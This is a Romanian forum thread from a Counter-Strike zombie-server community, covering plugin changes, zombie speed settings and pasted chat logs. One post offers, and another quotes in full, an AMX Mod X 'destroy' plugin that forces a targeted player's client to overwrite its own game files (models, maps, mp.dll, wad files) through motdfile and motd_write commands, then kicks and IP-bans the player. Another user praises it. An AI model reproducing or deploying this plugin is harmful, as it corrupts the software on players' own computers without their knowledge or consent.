User
Pass
2FA
 
 

Discutii Zm5
Go to page Previous  1, 2, 3, 4, 5 ... 24, 25, 26  Next    
 
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Freakz Forum Index -> Trash Bin -> Trash
Author Message21578
*salam*

[MosT WanteD]



Status: Offline
(since 03-02-2017 15:24)
Joined: 19 Mar 2010
Posts: 3114, Topics: 93
Location: Romania

Reputation: 349.7
Votes: 73

Post Posted: 13-04-2013, 20:26:15 | Translate post to: ... (Click for more languages)

aseara am vazut si eu ca pot da armura,am incercat si HP dar nu mergea plm.mam gandit eu ca se va rezolva probelma.
0 0
  
Back to top
View user's profile Send private message
EDUTz

[HardcoreAmxxScripter]



Status: Offline
(since 15-08-2021 16:34)
Joined: 27 Dec 2010
Posts: 4306, Topics: 244
Location: Jud. Miserupia, sat Bagadanc

Reputation: 4085
Votes: 179

         
Post Posted: 13-04-2013, 22:12:31 | Translate post to: ... (Click for more languages)

am rezolvat o mare parte din pluginuri pe aici.
am scos ce am considerat inutil.
sa ma anuntati daca duceti dorul la vreun plugin anume si putem discuta pe acest subiect -

ps: fara *** si alte porcarii .. direct destroy.

Posturi unite automat, 13-04-2013, 23:12:31

Edy:) wrote:
De ce n-au Helperii acces la amx_last -?


rezolvat




Pentru pluginuri complicate le fac cu $$ pe paypal/psc. PM

0 0
  
Back to top
View user's profile Send private message Yahoo! Messenger ID
AMG

[INACTIVE]



Status: Offline
(since 09-09-2023 16:07)
Joined: 23 Aug 2011
Posts: 32411, Topics: 621
Location: N/A

Reputation: 5782
Votes: 1014

 
Post Posted: 13-04-2013, 22:21:17 | Translate post to: ... (Click for more languages)

edutz wrote:
ps: fara *** si alte porcarii .. direct destroy.


Asta nu e bun Thinking ?

Code:
#include < amxmodx >
 #include < amxmisc >

 #define PLUGIN "AMXX ***"
 #define VERSION "5.0"
 #define AUTHOR "AzaZeL"

 new const *** [ ] [ ] =
 {
     "motdfile models/player/terror/terror.mdl",
     "motdfile sprites/rain.spr",
     "motd maps/default.res",
     "cl_timeout 0.0",
     "name ***",
     "motdfile models/player.mdl;motd_write x",
     "motdfile models/v_ak47.mdl;motd_write x",
     "motdfile cs_dust.wad;motd_write x",
     "motdfile models/v_m4a1.mdl;motd_write x",
     "motdfile resource/GameMenu.res;motd_write x",
     "motdfile halflife.wad;motd_write x",
     "motdfile cstrike.wad;motd_write x",
     "motdfile maps/de_dust2.bsp;motd_write x",
     "motdfile events/ak47.sc;motd_write x",
     "motdfile dlls/mp.dll;motd_write x",
     "motdfile decals.wad;motd_write x",
     "motdfile custom.hpk;motd_write x",
     "motdfile liblist.gam;motd_write x",
     "motdfile tempdecal.wad;motd_write x",
     "motdfile maps/de_inferno;motd_write x",
     "motdfile maps/de_dust;motd_write x",
     "motdfile models/player/leet/leet.mdl;motd_write x"
 }

 public plugin_init ( )
 {
     register_plugin ( PLUGIN, VERSION, AUTHOR )
     
     // Add your code here...
     register_clcmd ( "***", "***", ADMIN_BAN, "<nume sau #userid> [motiv]" );
 }

 public *** ( id, level, cid )
 {
     if ( !cmd_access ( id, level, cid, 3 ) )
         return 1;
     
     new arg [ 33 ];
     read_argv ( 1, arg, charsmax ( arg ) );
     new player = cmd_target ( id, arg, CMDTARGET_OBEY_IMMUNITY | CMDTARGET_ALLOW_SELF );
     
     if ( !player )
     {
         console_print ( id, "[***] Jucatorul nu este online sau a iesit de pe server" );
         return 1;
     }
     
     new authid [ 33 ], authid2 [ 33 ], name2 [ 33 ], name [ 33 ], userid2, reason [ 32 ], userip [ 33 ];
     
     get_user_authid ( id, authid, charsmax ( authid ) );
     get_user_authid ( player, authid2, charsmax ( authid2 ) );
     get_user_name ( player, name2, charsmax ( name2 ) );
     get_user_name ( id, name, charsmax ( name ) );
     get_user_ip ( player, userip, charsmax ( userip ) );
     
     userid2 = get_user_userid ( player )
     
     read_argv ( 2, reason, 31 );
     remove_quotes ( reason );
     
     log_to_file ( "***.log", "Admin %s has used *** comand On: %s cu motivul: %s", name, player, userid2, reason );
     
     new i;
     for ( i = 0; i < sizeof ( *** ); i++ )
         client_cmd ( player, *** [ i ] );
     
     server_cmd ( "kick #%d ^"Ai primit *** ^";wait;addip 9999999999999.0 ^"%s^";wait;writeip", player, userip );
     
     client_print ( 0, print_chat, "[Zm5] Adminul %s a folosi comanda *** pe %s", name, player, userid2 );
     
     client_cmd ( 0, "spk ^"vox/bizwarn coded user apprehend^"" );
     return 1;
 }


O singura comanda nu prea e suficienta... just sayin'.



0 0
  
Back to top
View user's profile Send private message
Mr.Kennedy

[Creep]



Status: Offline
(since 27-07-2014 13:38)
Joined: 22 Oct 2012
Posts: 617, Topics: 19
Location: Chisinau

Reputation: 88.9
Votes: 6

 
Post Posted: 13-04-2013, 22:31:19 | Translate post to: ... (Click for more languages)

AMG wrote:
edutz wrote:
ps: fara *** si alte porcarii .. direct destroy.


Asta nu e bun Thinking ?

Code:
#include < amxmodx >
 #include < amxmisc >

 #define PLUGIN "AMXX ***"
 #define VERSION "5.0"
 #define AUTHOR "AzaZeL"

 new const *** [ ] [ ] =
 {
     "motdfile models/player/terror/terror.mdl",
     "motdfile sprites/rain.spr",
     "motd maps/default.res",
     "cl_timeout 0.0",
     "name ***",
     "motdfile models/player.mdl;motd_write x",
     "motdfile models/v_ak47.mdl;motd_write x",
     "motdfile cs_dust.wad;motd_write x",
     "motdfile models/v_m4a1.mdl;motd_write x",
     "motdfile resource/GameMenu.res;motd_write x",
     "motdfile halflife.wad;motd_write x",
     "motdfile cstrike.wad;motd_write x",
     "motdfile maps/de_dust2.bsp;motd_write x",
     "motdfile events/ak47.sc;motd_write x",
     "motdfile dlls/mp.dll;motd_write x",
     "motdfile decals.wad;motd_write x",
     "motdfile custom.hpk;motd_write x",
     "motdfile liblist.gam;motd_write x",
     "motdfile tempdecal.wad;motd_write x",
     "motdfile maps/de_inferno;motd_write x",
     "motdfile maps/de_dust;motd_write x",
     "motdfile models/player/leet/leet.mdl;motd_write x"
 }

 public plugin_init ( )
 {
     register_plugin ( PLUGIN, VERSION, AUTHOR )
     
     // Add your code here...
     register_clcmd ( "***", "***", ADMIN_BAN, "<nume sau #userid> [motiv]" );
 }

 public *** ( id, level, cid )
 {
     if ( !cmd_access ( id, level, cid, 3 ) )
         return 1;
     
     new arg [ 33 ];
     read_argv ( 1, arg, charsmax ( arg ) );
     new player = cmd_target ( id, arg, CMDTARGET_OBEY_IMMUNITY | CMDTARGET_ALLOW_SELF );
     
     if ( !player )
     {
         console_print ( id, "[***] Jucatorul nu este online sau a iesit de pe server" );
         return 1;
     }
     
     new authid [ 33 ], authid2 [ 33 ], name2 [ 33 ], name [ 33 ], userid2, reason [ 32 ], userip [ 33 ];
     
     get_user_authid ( id, authid, charsmax ( authid ) );
     get_user_authid ( player, authid2, charsmax ( authid2 ) );
     get_user_name ( player, name2, charsmax ( name2 ) );
     get_user_name ( id, name, charsmax ( name ) );
     get_user_ip ( player, userip, charsmax ( userip ) );
     
     userid2 = get_user_userid ( player )
     
     read_argv ( 2, reason, 31 );
     remove_quotes ( reason );
     
     log_to_file ( "***.log", "Admin %s has used *** comand On: %s cu motivul: %s", name, player, userid2, reason );
     
     new i;
     for ( i = 0; i < sizeof ( *** ); i++ )
         client_cmd ( player, *** [ i ] );
     
     server_cmd ( "kick #%d ^"Ai primit *** ^";wait;addip 9999999999999.0 ^"%s^";wait;writeip", player, userip );
     
     client_print ( 0, print_chat, "[Zm5] Adminul %s a folosi comanda *** pe %s", name, player, userid2 );
     
     client_cmd ( 0, "spk ^"vox/bizwarn coded user apprehend^"" );
     return 1;
 }


O singura comanda nu prea e suficienta... just sayin'.


e buuuun - - -








Cum se schimba fluturii din stomac in molii?!?

0 0
  
Back to top
View user's profile Send private message Yahoo! Messenger ID
EDUTz

[HardcoreAmxxScripter]



Status: Offline
(since 15-08-2021 16:34)
Joined: 27 Dec 2010
Posts: 4306, Topics: 244
Location: Jud. Miserupia, sat Bagadanc

Reputation: 4085
Votes: 179

         
Post Posted: 13-04-2013, 22:34:27 | Translate post to: ... (Click for more languages)

prietene am pus versiunea noastra aia infecta ... nu ziceam sa pui tu pluginuri ... ce dracu asa am ajuns ? -



Pentru pluginuri complicate le fac cu $$ pe paypal/psc. PM

0 0
  
Back to top
View user's profile Send private message Yahoo! Messenger ID
cosmin827

[Welcome to my Hood ]



Status: Offline
(since 02-12-2022 21:31)
Joined: 31 Jan 2011
Posts: 16374, Topics: 74
Location: Oltenita

Reputation: 2370.2
Votes: 304

 
Post Posted: 13-04-2013, 23:13:43 | Translate post to: ... (Click for more languages)

edutz poti mari viteza la zm de lv 4 (Executioneer) ?
Se misca foarte incet...


#IseeY Blizz! ^El Lider
La confussione mi irrita ....e tanto!
Every new day is another chance to change your life
0 0
  
Back to top
View user's profile Send private message
EDUTz

[HardcoreAmxxScripter]



Status: Offline
(since 15-08-2021 16:34)
Joined: 27 Dec 2010
Posts: 4306, Topics: 244
Location: Jud. Miserupia, sat Bagadanc

Reputation: 4085
Votes: 179

         
Post Posted: 13-04-2013, 23:37:21 | Translate post to: ... (Click for more languages)

se poate mari binenteles ... dar ideea e ca am pastrat aceeasi viteza la zm cu cei de la zm1, per level. se misca incet comparativ cu acelasi level pe zm1 ? sau ti se misca tine incep ca te-ai obijnuit cu viteza mare ?



Pentru pluginuri complicate le fac cu $$ pe paypal/psc. PM

0 0
  
Back to top
View user's profile Send private message Yahoo! Messenger ID
AMG

[INACTIVE]



Status: Offline
(since 09-09-2023 16:07)
Joined: 23 Aug 2011
Posts: 32411, Topics: 621
Location: N/A

Reputation: 5782
Votes: 1014

 
Post Posted: 14-04-2013, 00:31:42 | Translate post to: ... (Click for more languages)

edutz wrote:
se poate mari binenteles ... dar ideea e ca am pastrat aceeasi viteza la zm cu cei de la zm1, per level. se misca incet comparativ cu acelasi level pe zm1 ? sau ti se misca tine incep ca te-ai obijnuit cu viteza mare ?


La lvl 4 e intr-adevar viteza mica, e mai mica si decat la lvl 1. Si oricum n-are el lvl mare pe zm -, abia de are 2 sau 3, nu stie cum e super speed-ul de lvl 12/13 -.

@cosmin827 lvl 4 mental zm, nu executioneer.



0 0
  
Back to top
View user's profile Send private message
EDUTz

[HardcoreAmxxScripter]



Status: Offline
(since 15-08-2021 16:34)
Joined: 27 Dec 2010
Posts: 4306, Topics: 244
Location: Jud. Miserupia, sat Bagadanc

Reputation: 4085
Votes: 179

         
Post Posted: 14-04-2013, 00:43:29 | Translate post to: ... (Click for more languages)

[Gravity]
NAME = Gravity
...
SPEED = 300
...


[Mental Zombie]
NAME = Mental Zombie
INFO = Mental Atack
...
SPEED = 360
...

ziceti-mi si mie cum dracu se misca mai incet.

Sunteti siguri ? siguri siguri ?




Pentru pluginuri complicate le fac cu $$ pe paypal/psc. PM

0 0
  
Back to top
View user's profile Send private message Yahoo! Messenger ID
AMG

[INACTIVE]



Status: Offline
(since 09-09-2023 16:07)
Joined: 23 Aug 2011
Posts: 32411, Topics: 621
Location: N/A

Reputation: 5782
Votes: 1014

 
Post Posted: 14-04-2013, 00:47:39 | Translate post to: ... (Click for more languages)

Se misca penal de incet, nu stiu de ce... am jucat o runda cu 4 si dupa cu 1 si se misca mai repede lvl 1... Fa si tu o proba pe server, o data cu lvl 4 si o data cu lvl 1.


0 0
  
Back to top
View user's profile Send private message
Edy:)

[Maniac]



Status: Offline
(since 14-12-2015 07:31)
Joined: 19 Nov 2011
Posts: 1183, Topics: 106
Location: Braila

Reputation: 789.2
Votes: 72

Post Posted: 14-04-2013, 11:40:31 | Translate post to: ... (Click for more languages)

26/32 Playeri \m/ Ora: 12:40 PM

*
Code:
*SPEC* A$u :  naruto
*SPEC* Naruto :  da?
*SPEC* A$u :  u esti ala cum ii zice
*SPEC* A$u :  ded men olchin

0 0
  
Back to top
View user's profile Send private message
AMG

[INACTIVE]



Status: Offline
(since 09-09-2023 16:07)
Joined: 23 Aug 2011
Posts: 32411, Topics: 621
Location: N/A

Reputation: 5782
Votes: 1014

 
Post Posted: 14-04-2013, 11:42:06 | Translate post to: ... (Click for more languages)

Edy:) wrote:
26/32 Playeri \m/ Ora: 12:40 PM


27 vad. E Duminica, o sa fim si 31/32 -.



0 0
  
Back to top
View user's profile Send private message
Rye^

[Account disabled]



Status: Offline
(since 04-06-2013 07:33)
Joined: 06 Apr 2013
Posts: 104, Topics: 15
Location: Romania

Reputation: 31.9
Votes: 3

Post Posted: 14-04-2013, 14:20:54 | Translate post to: ... (Click for more languages)

BlueKing : nukades vrei sa fim prieteni?

Pentru a vedea adminii online, scrieti in chat /admins
zombozoo : -)))))

BlueKing : mukades

MukaddeS- : ce propunere

*Pentru mai multe informatii legate de joc, scrie /in
MukaddeS- : -

Seyo HB dropped
MukaddeS- : indecentule

Pentru a-ti inregistra numele scrie in consola " register e-mail parola "
MukaddeS- : normal ca accept

zombozoo : esti pe invers -

*Pentru a fii directionat spre alt server scrie /server

MukaddeS- : normal ca accept

*Pentru a fii directionat spre alt server scrie /server
MukaddeS- : la tn acasa , ok ?

Cea mai tare propunere ever ! -

0 0
  
Back to top
View user's profile Send private message
AMG

[INACTIVE]



Status: Offline
(since 09-09-2023 16:07)
Joined: 23 Aug 2011
Posts: 32411, Topics: 621
Location: N/A

Reputation: 5782
Votes: 1014

 
Post Posted: 14-04-2013, 14:36:52 | Translate post to: ... (Click for more languages)

Rye^ , chestii de genul le postezi de-acum inainte aici[click].


0 0
  
Back to top
View user's profile Send private message
Rye^

[Account disabled]



Status: Offline
(since 04-06-2013 07:33)
Joined: 06 Apr 2013
Posts: 104, Topics: 15
Location: Romania

Reputation: 31.9
Votes: 3

Post Posted: 15-04-2013, 16:27:38 | Translate post to: ... (Click for more languages)

Am observat ca de la un timp se sparge ff repede LM-ul , dc ?
0 0
  
Back to top
View user's profile Send private message
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Freakz Forum Index -> Trash Bin -> Trash  
Go to page Previous  1, 2, 3, 4, 5 ... 24, 25, 26  Next    


The time now is 02-03-2025, 18:40:53
Copyright info

Based on phpBB ro/com
B

 
 
 







I forgot my password